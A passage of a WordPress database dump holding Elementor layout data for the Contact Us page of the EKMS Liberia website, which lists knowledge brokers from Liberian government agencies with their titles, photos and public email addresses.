alse},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24438,3605,'_elementor_edit_mode','builder'),(24439,3605,'_elementor_template_type','wp-page'),(24440,3605,'_elementor_version','3.0.16'),(24441,3605,'_wp_page_template','default'),(24442,3605,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong>\\n<\\/br>\\nManager, Strategic Planning Unit\\n<\\/br>\\nForestry Development Auhtority\\n<\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_colu